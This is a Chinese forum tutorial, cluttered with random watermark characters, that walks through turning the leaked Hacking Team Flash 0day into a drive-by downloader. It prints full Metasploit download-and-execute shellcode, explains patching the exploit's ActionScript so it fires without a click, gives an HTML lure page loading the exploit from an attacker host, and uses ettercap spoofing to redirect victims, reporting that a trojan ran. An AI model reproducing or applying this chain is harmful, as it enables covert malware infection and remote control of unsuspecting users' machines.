|
. a; Q$ [3 A! {& K- t- s( F 三、flash 0day之手工代码修改制作下载者实例入侵演示 $ K+ m+ g1 l* ^3 A2 Z
# h4 o- r D' J: p' o
1 D$ ^2 L: y3 |; w7 n2 g# T 利用到的工具:
8 R2 @/ t1 F- \! l) @" _/ c2 z; `' i
0 Y$ n9 V( m3 E8 p) y3 L4 _0 X
6 S$ E) b* W- y" Z+ s4 U Msf
" h9 r2 l: B9 y- e0 I
& ]6 B" c. f: x% y# `1 C4 J2 m- u( w/ h& u8 z
Ettercap 7 ]) {( j( v+ F J
+ Y% `' I1 `% r S; l( u
* s& ~- E9 i# d/ C
Adobe Flash CS6
$ O+ b: q; e. v) v
/ o6 B9 G" a& l, P7 @1 _# f8 b, J, e! n9 t2 l
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ( B+ w' D& ]& M0 [( `6 K% w
# N, A# m5 G; k$ ]% c: t2 |5 Q2 I6 u, L9 ]
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options # M8 _+ z5 ?2 s" T9 q
) G/ J2 m, [. D3 z6 L
' @! n$ y. U8 S) ^2 N 如图: 7 W* Q) m5 i" T7 b) A+ }3 Z) M
$ `5 O4 L- K- U( @9 d& V9 G2 m4 L' o' H7 p2 \5 o* d
. `& K2 ^' t x" y+ ^; u3 E- x
- T. l0 L, U6 P: {& Z
: w! ^' v H- O6 s( H . N/ C; x- E$ l( H0 {+ x
; M- e6 q3 s& L0 T& n. Q
$ x3 Q# C- H3 \! S" t- ~ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
$ s8 d7 C0 R! @5 d- q7 q 2 |+ h0 j+ A; j4 s5 g& i1 U1 U
6 ^# i! K+ C" p8 B9 z. r
8 A; B9 X; ]+ Y + q) G9 q" v7 Z4 x5 k, Q
# C0 B5 z# T; m/ n2 {0 J
, W. W( [7 Y: [ E! [! J
4 x# l/ w O8 i) ~% k7 k
- K' U$ c( a |/ R 然后执行generate -t dword生成shellcode,如下: ; W: d* L" n* U. p+ \
7 ~0 x" j4 s/ I
( H7 L. Q6 X# k) F0 p
- w; C. @1 R* i% I, L- y4 o " t g6 U% ^4 x' `2 V6 [$ X
0 m9 w5 S0 E4 k: k" I7 K" G" f, _9 W4 m 复制代码到文本下便于我们一会编辑flash exp,如下: - k w4 }8 N; H
6 l; O- O6 I( Y5 ~8 {* P) M
3 g& W Z9 R5 k U
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 4 z+ p# d5 k1 R5 V
; H* y3 |% e+ r) ~ Q3 P6 W, W
+ j( [0 @1 r7 v! h) t- a( t: f& p, q 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 1 Z; O, S# r5 L( q, I
7 H% C; A: |) f6 ?3 D) h. e
, v* Y" ~" L" l, h1 Z" E
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
" ]) \5 r% N. X9 Z2 [( ?
' r2 z0 T9 H6 H% @% E# f: ~' S% {4 ?' {, P
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
4 J1 t; f) Q1 d7 S' I/ W7 J/ V# h
4 Q7 j$ M% V9 T& h0 e0 j4 n
: m4 o; Q3 _* L' }- L 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ! x4 Y9 `. i! i0 ^6 H9 [# |$ J4 _
^( A' p" Q# i) w( m
+ [5 S' v. M" x 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, , ~8 s. {1 I( W9 c$ }' ?: U
& g: C( N$ I- n v* z. ^
7 R+ A+ b: i: c) T 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
( X3 e* E% Q4 C" Z8 t% g& O # n* x( Y8 Y7 N7 j! N8 d1 u
0 d8 E1 |% K3 l) z. W4 \: F
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
, M1 ~% `' G* i' o: w, I9 @
& h: x5 y& s' r' G i/ |) W% C4 l0 A# W% h. j3 Q, A
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
, I& x& C2 ]6 H6 P: n4 H" ]$ m
- B" M: E; Z8 [1 _ M f/ O/ M5 @3 n2 m u8 I& o( d
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
& j! b/ C7 U0 [! Z ' q8 l3 M5 V: j0 d& P7 F
! {& I; z- U9 y 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 9 T; g$ J2 N7 j) J5 C- T) v
5 G9 q# ]3 W% W3 |6 C9 d' `: u
% S! f6 \* }# o9 k 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 7 @5 A+ @ t; k% [, Z) n
; z6 \+ y! |' q3 J
, A6 d. b" {: F3 j( e+ G, u4 ], ?- j: H 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, : U! J! Z5 Z6 p5 I% l
& K J( T! `$ c9 y" y! {, _: w1 Q( s+ z% q7 N7 C
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 3 [" Y& t) a# B! k3 i, q
5 Z. _7 t$ K/ g
0 z3 l% J( X/ Q0 B% b6 f9 B& M , q) ]4 V! m/ h3 {: j' @
% j; s# ?6 V; k; p! E- l4 C Y
% U3 M1 ]' J h
% d. @: t# K- D7 t0 n# ]4 P' l - s8 f$ A* @. i- ~* U9 D6 S
+ A" s8 O! a5 J$ z0 J 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 8 u( S4 @8 T+ U) [/ B
3 _! k' p9 t1 H1 L, F3 ^' _8 E) z; \& i- w2 x; o- {; S' z
) r6 p$ X* V q
- {( x) v# z5 c, Z/ i/ X1 @' p/ x* C) c1 |7 \# j0 e
先修改ShellWin32.as,部分源代码如图: 3 Y5 j+ q7 K( z; S+ `
`8 d+ L8 u- q5 M
. c/ }/ Q( q% J$ N7 W
& a7 I! y& e& g) ^9 _
2 p$ _* h* _$ U
# U* h; V. d7 d
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ) C# k# r3 F+ H$ ^! s# U
4 X* C6 G# `* Z6 I7 S
( v6 s8 {7 l9 m0 D" }
+ R+ h7 Y- c+ c/ u! D7 D/ Q 6 M. W! s+ Y8 J* k% C
9 {- q2 s/ }7 U! S5 J b
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
+ c: u: Z6 @: r; ^! y ( a5 }! v- h5 \3 K8 V9 g
3 B" A4 V; g1 g, G+ a + [1 V$ l4 c; _' _' F @; u" G
( P9 _( h3 {2 w9 P8 ^ V* T: o9 r1 _3 ?: Q& `( o/ q6 C' V
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
- e3 [9 M3 J6 c% k5 H ( k6 q5 J* M+ |% l
# M B6 v5 U' m( p. N4 f. Q ( c, Y/ a- j: I# Z
+ I# Y0 e& X$ q4 E4 F4 n( J# m) _/ E1 k5 {, H% D( h
9 |: X1 e7 h0 k) ^$ T2 m ' i( I* c, V' S# j3 @
( Z; t1 \5 _8 b8 E+ o
; o$ H7 w- q& ^) R, K# {' M% n
6 _6 u$ }. _* M$ u! v @& t4 h" l! r \9 @7 ^
然后点保存,下面我们来编译一下,打开 % p! [: l' n8 B+ Y
d$ ~: \! t D) p6 I6 X% z" h
/ ?6 A# v7 q, W) `0 { v9 d4 h% M exp1.fla然后点文件-发布,看看编译没错误
* N/ o: U* E, ~: W; ~ $ J. _" t( Q2 F$ A1 C& n& R5 f! h
1 n5 K+ @, ?5 G, i+ T2 B
* \6 d9 Q& `$ k) M' {# c
) S( A2 B" | g9 U: q
' n' v- m& M/ z( O d+ Q " T4 ~2 i8 l- {: K! p/ Z0 f
) N4 E C- [2 G e0 w' M# G# \/ P
6 e R \1 b1 t( K# Z' z
& @2 U; ~. i- M( \
2 H- E+ r0 p( C! g* ~( h0 o) \; V
, J* h$ E" k- Y% ~5 d9 _, `" c
1 h: Z, P1 q, Z8 w) p% d; y9 l- b6 [; O- h, L
然后我们把生成的 7 D5 x8 ?$ L: G: [# t6 U
, z6 ]8 N/ V+ e% e) k
4 }- @; h" U$ X1 M
exp1.swf丢到kailinux 的/var/www/html下: $ p: Y0 ?5 s# N" v, B/ J3 j0 Q
9 o% @3 ]. b9 u0 \; Y5 H
0 c0 U5 ]5 {9 U$ _5 {0 j 然后把这段代码好好编辑一下
: A h2 L& K, G+ A% ]! n
& y9 }3 j/ A. ]3 Q
6 B" Q3 e" w7 @, c: } 7 h7 ?# t2 i& `1 T$ V! G
+ i# l6 B% K4 z) G& g
1 O/ P5 Y6 t5 H( x; @
+ h- [+ _: @) _6 y- O5 {2 p2 ]
+ ]1 c; `% Z0 ]) {, w. ^- n& c3 u" c1 S- D4 O) A5 Q* w; i
& x C2 M4 l8 L, \ + ?- A! B# s- B
+ d0 H# p! {6 n2 D; ], I5 q
" z, C8 R# ^ M4 P# _9 |0 ?! W _
2 P# V8 y9 a* U
. }5 w* g- C3 W' | u, f: r8 \
" s4 r4 [1 N( h7 L
: N- l# E H- ~
( |0 c: C2 ?& u9 X0 F 5 x1 Y7 k/ a2 h$ {, Z- N! N R9 P
+ w. Z! F6 y) p L; A
: ?/ Z" W" v: L. r" ~+ a <!DOCTYPE html>
2 i6 Y7 k6 B& e" e 6 x2 \- c3 j5 c& I& V2 b! I6 P+ [
# j# a8 z+ m; n! b: z <html>
. s3 u5 Y* V1 l' D : b/ R0 o( B6 f
5 F+ J4 M4 E$ ?' y& H ` <head> 4 D6 g4 e2 Y! j$ t3 m- N6 `
( j& }% |1 }# A# V _3 P! T
9 s1 z- z, Q% E7 D0 L4 d+ o <meta http-equiv="Content-Type" content="text/html; - `# k; ^4 d' V( l5 @
( A/ Z: Y0 c: e- j( v; \5 g8 C( t0 C5 h
charset=utf-8"/> & [, v! r$ Z- e- T
, `1 e5 J, M. c" ]: B( A3 E( ?4 ]' T5 N+ {
</head> ! T6 w) K2 L- Q) t1 ?1 M
/ Z3 d/ z. K% w9 C$ D. h- h# [$ ~( |; a4 A& ]" `
<body> $ O( J/ l" p9 f: X
. _8 `$ E9 P& M- Y7 m* m' K- {; e2 R6 ]$ l2 A
<h2> Please wait, the requested page is loading...</h2>
. o7 t% k4 z# m( s! s6 z" ~8 h$ P) I q; U- m! _2 t4 [8 |$ {; z3 ^
8 B1 n+ j6 w! |( p
<br> ' N+ l: L9 q( {
5 q* c: q) R' w
; N) i: s+ e! x <OBJECT
4 y4 b" ~" K$ v# G+ r/ R 6 ]( B7 y: K/ D* V
3 e: T* E5 O3 X1 W& d classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie 5 S" w4 l# v5 I
7 p7 T- a% t9 a3 Y; F$ U/ B5 E+ }" y$ C2 D# R Q) F
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> : w* d' P; q" | V t
- ~7 z5 [+ @, ?5 C, a4 V" V$ q' c
</body>
+ C8 E) M0 B+ g( C/ X! ^4 A- K9 } 8 j3 X* w8 _' M
" f! V) ?! o: r; `# Z <script>
2 q! Y! E5 |6 U Q* f3 r
4 i3 I/ w ^% u0 w* ?8 _' R% S( m: A# y/ w, v$ e; f$ f% E6 p
setTimeout(function () {
2 ]3 i1 x. w6 `( i! F . H6 G% P, u( Y ]8 @' k! a
8 h6 ^; x z2 O3 R) ^1 \! X & G+ R+ ? M6 m' w) d
. B* [ ?! n, e, i# J
3 g) i/ h6 a2 k5 D2 [8 l0 q window.location.reload(); & J! {% \* s1 \2 v- U: f! P% |
1 @! Y* t+ a* e. T- ?
( p7 s* j! E, w+ _0 s [' C, U- x
}, 10000);
5 Z# ~5 F0 c+ N' G * h% H! f0 S# I, Q- U% {
- c1 u$ i8 X" n! H0 Q. ^% u ; i' V: D' Q8 \- ~4 b8 Z3 p- I5 [
$ P- }8 d+ l+ R/ p" p Q9 f# k9 o$ _ ^9 T: i1 y
</script> 7 z. K$ p' h% p# P3 D
" F/ p c8 ?; {( j# F% \& x4 b* b& W" w
</html>
5 S! a- i7 C. E& v, U3 E6 _
+ T2 w, b8 z; [& I0 J+ A; ~3 Q2 v. [3 F# U
! W! X1 s. o0 [7 i
6 E% k x3 K% e- m+ A
! r h2 X- d. c" C2 h
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
) F: F4 _, s$ ?5 n
- U$ v% C3 a8 G1 {* k/ d: p" J+ ?) A9 Q2 T
. T6 r" W+ w! U( i% K6 m/ b$ s+ N
% l2 W( u' ~; h% Y. q- m% g0 d
! O; T: T( ]* R- Q3 W1 l
3 J# [4 Y, Q1 ]' c( G$ u. y
: V, e" @2 q3 M t4 {6 F: K$ f' Z) u( [, N
6 b* f5 W# n! }" l
1 u% C9 Q" H* ? B$ f- ^) O4 k9 ] 6 H" O- w3 u4 E& l9 ~( @ C
0 B# F: P5 w+ M, Q' _# {' _7 p0 Q
4 I6 j% t3 O9 ~: h( n. ]' ^& E# y 2 B8 Q; P* O2 S% u, _- c
, U7 x, t- @; l3 \ 下面我们用ettercap欺骗如图: . u+ ^ a4 l) P, K/ g/ C
& s. _- n0 S5 g3 M- h6 t& h: B
, Q9 o( `1 g8 N3 d6 u) b$ L U! w
' U3 S% L& y) U/ X/ n
2 O6 ~* R8 Y# E* s0 f; X F6 N$ f$ c, h& T6 o6 s" l3 D+ p2 B
! Z. x$ M5 f8 E1 w0 Z
( d* Y4 V9 T/ J( z. U& e0 j' G+ B5 k
+ d7 P% Y2 G* y6 d 下面我们随便访问个网站看看:
& a2 k, T9 B4 O* i& a! {+ j
3 e) \6 ~9 n% M% J: G* {) W
' L" [* i$ z$ R; f v* r8 c 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 9 C) \ u! F0 q6 |* Y8 G, k
/ W+ M. w, |9 n
# @' J0 `/ E1 P) `1 K # V, p" D9 Z0 e1 P
' R0 m; `7 u% _- J* r9 x5 b9 P4 i- d9 Z O2 R
我们看另一台, ) o6 S& \# U: C' `- t$ L
$ @& j$ {" V6 ~
. X+ Y& G$ b0 E$ z2 x( Z5 U 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
- N( y9 Z$ |! ^2 s- d, N/ q1 G- h |